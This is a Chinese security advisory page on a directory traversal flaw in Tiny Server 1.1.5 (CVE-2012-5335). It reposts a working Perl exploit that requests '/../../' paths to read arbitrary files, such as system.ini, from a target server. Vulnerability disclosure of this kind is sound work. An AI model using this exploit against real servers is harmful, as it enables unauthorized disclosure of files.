Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Tiny Server远程目录遍历漏洞

发布日期:2012-03-17
更新日期:2012-10-10受影响系统:
Tiny Server Tiny Server 1.1.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52541
CVE ID: CVE-2012-5335Tiny Server是个基本的HTTP服务器。Tiny Server 1.1.5存在目录遍历漏洞,可允许远程攻击者通过HTTP请求内的URI中的“..”读取任意文件。<*来源:KaHPeSeSe
  *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/perl -w
#Title  : Tiny Server v1.1.5 Arbitrary File Disclosure Exploit
#Author : KaHPeSeSe
#Test : PERFECT XP PC1 / SP3
#Date : 15/03/2012
#Thanks : exploit-db.com
use LWP::Simple;
use LWP::UserAgent;
    system("color","A");
    system("cls");
            print " ____________________________________________________________________ ";
            print " ....... Tiny Server v1.1.5 Arbitrary File Disclosure Exploit ....... ";
            print " ....... Founded and Exploited by KaHPeSeSe                 ....... ";
            print " ____________________________________________________________________ ";
    if(@ARGV < 3)
        {
            print "[-] Error! ";
            print "[-] Look to example ";
            &help; exit();
                                            }
    sub help()
        {
            print "[+] How  to : perl $0 IP Port File ";
            print "[+] Example : perl $0 192.168.1.2 80 windows/system.ini ";
                                            }
            ($TargetIP, $Port, $File) = @ARGV;
            print("Connet to Server.... ");
            sleep(2);
            $path="/../../";
            my $link = "http://" . $TargetIP . ":" . $Port . $path . $File;
            print("Connected ");
            sleep(2);
            print("Waiting for moment ");
            sleep(1);
            print("Done! Reading $File... ");
            sleep(3);
            $ourfile=get $link;
    if($ourfile)
        {
            print(" ____________________________________________________ ");
            print("$ourfile ");
            print("_____________________________________________________ ");
                                            }
    else
    {
            print("_____________________________________________________ ");
            print(" Not Found !!! ");
            print("_____________________________________________________ ");
            exit;
                                            }建议:
--------------------------------------------------------------------------------
厂商补丁:Tiny Server
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://tinyserver.sourceforge.net/Pre Printing Press "pid"参数SQL注入漏洞asaanCart多个输入验证漏洞相关资讯      Tiny Server  目录遍历漏洞  Tiny Server漏洞 
  • Oracle GlassFish Web Space   (03/14/2013 15:01:43)
  • PMSoftware Simple Web Server目录  (01/08/2013 08:37:45)
  • EMC Data Protection Advisor目录  (12/27/2012 08:27:01)
  • Schmid Watson Management Console  (01/13/2013 07:45:35)
  • NetIQ Privileged User Manager   (12/27/2012 17:13:16)
  • CoDeSys Control服务CmbWebserver.  (12/01/2012 09:28:07)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
    版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图